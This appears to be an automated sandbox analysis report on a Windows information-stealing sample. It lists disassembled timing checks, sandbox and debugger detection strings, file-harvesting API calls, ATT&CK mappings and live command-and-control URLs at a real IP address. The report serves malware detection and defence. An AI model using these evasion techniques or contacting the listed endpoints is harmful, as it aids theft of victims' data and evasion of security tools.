                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FC3A second address: A3FC69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F242906E932h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F242906E92Dh 0x00000012 jnc 00007F242906E926h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FC69 second address: A3FC7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jbe 00007F2429065B46h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44E48 second address: A44E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44E4D second address: A44E52 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44E52 second address: A44E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F242906E92Ah 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F242906E932h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44E77 second address: A44E97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2429065B4Dh 0x00000009 jmp 00007F2429065B4Fh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44FC5 second address: A44FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F242906E926h 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44FD5 second address: A44FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2429065B4Dh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4544F second address: A4545E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F242906E92Ah 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44A0D second address: A44A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44A11 second address: A44A15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48BAD second address: A48BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48BB1 second address: A48BCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F242906E92Fh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48BCA second address: A48BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48BCE second address: A48BEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F242906E933h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4FA5D second address: A4FA62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4FA62 second address: A4FA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52EAC second address: A52EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52857 second address: A5285D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5285D second address: A52863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52AF2 second address: A52AF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52AF6 second address: A52B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2429065B52h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52B0E second address: A52B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52B14 second address: A52B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2429065B55h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52B2D second address: A52B31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A579B6 second address: A579DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2429065B46h 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jp 00007F2429065B46h 0x00000013 jmp 00007F2429065B52h 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57B4C second address: A57B50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8945 second address: AE8950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F242906E926h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8C18 second address: AE8C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8C1C second address: AE8C38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F242906E935h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9090 second address: AE90B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F2429065B4Ah 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push edx 0x00000014 jp 00007F2429065B46h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED7F1 second address: AED7F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDB21 second address: AEDB26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDB26 second address: AEDB2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51402B8 second address: 51402D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2429065B4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov di, ADEEh 0x00000011 mov esi, ebx 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51402D4 second address: 5140360 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F242906E92Eh 0x00000009 and esi, 1D8C6638h 0x0000000f jmp 00007F242906E92Bh 0x00000014 popfd 0x00000015 mov ebx, eax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007F242906E935h 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F242906E92Eh 0x00000026 mov ebp, esp 0x00000028 pushad 0x00000029 jmp 00007F242906E92Eh 0x0000002e pushfd 0x0000002f jmp 00007F242906E932h 0x00000034 add esi, 11772228h 0x0000003a jmp 00007F242906E92Bh 0x0000003f popfd 0x00000040 popad 0x00000041 pop ebp 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5140360 second address: 5140364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5140364 second address: 514036A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514036A second address: 5140370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51403BD second address: 51403C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51403C1 second address: 51403E0 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 0B25FD73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c mov ecx, 1E11A7EBh 0x00000011 movzx eax, bx 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 mov ah, F8h 0x00000019 push eax 0x0000001a push edx 0x0000001b mov dx, 2BB6h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51403E0 second address: 51403EF instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c movzx ecx, dx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51403EF second address: 51403F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51403F3 second address: 514040D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cl, bh 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ax, 7231h 0x00000010 mov ebx, esi 0x00000012 popad 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514040D second address: 5140411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5140411 second address: 5140417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5140417 second address: 514041D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514041D second address: 5140421 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A07E36 second address: A07E48 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2429065B4Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8518AF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9FE0E3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9FCCA1 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A265EF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A03ACC instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A86ECC instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006038B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00604910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00604910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_005FDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_005FE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00604570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00604570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_005FED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_005FBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005FDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005F16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00603EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00603EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FF68A FindFirstFileA,0_2_005FF68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005FF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F1160 GetSystemInfo,ExitProcess,0_2_005F1160
                Source: file.exe, file.exe, 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2067248972.00000000013EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware>.%H
                Source: file.exe, 00000000.00000002.2067248972.0000000001433000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp^F
                Source: file.exe, 00000000.00000002.2067248972.0000000001463000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2067248972.00000000013EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13408
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13420
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13405
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13428
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13460
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F45C0 VirtualProtect ?,00000004,00000100,00000000 0_2_005F45C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00609860
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609750 mov eax, dword ptr fs:[00000030h] 0_2_00609750
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00607850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00607850
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00609600
                Source: file.exe, file.exe, 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00607B90
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00606920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, 0_2_00606920
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00607850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00607850
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00607A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00607A30

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.5f0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2067248972.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.2023298984.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.5f0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2067248972.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.2023298984.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
                MITRE ATT&CK Matrix (a number before a technique name is the count of signatures matched for it)

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Source | Detection | Scanner | Label
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37 | 100% | URL Reputation | malware
                http://185.215.113.37 | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                http://185.215.113.37/f | 17% | Virustotal |
                http://185.215.113.37/e2b1563c6670f193.php& | 17% | Virustotal |
                http://185.215.113.37/e2b1563c6670f193.php/ | 18% | Virustotal |
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ctionSettingsa | file.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37 | file.exe, 00000000.00000002.2067248972.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2067248972.000000000141B000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware; URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php/ | file.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.php& | file.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/f | file.exe, 00000000.00000002.2067248972.000000000141B000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
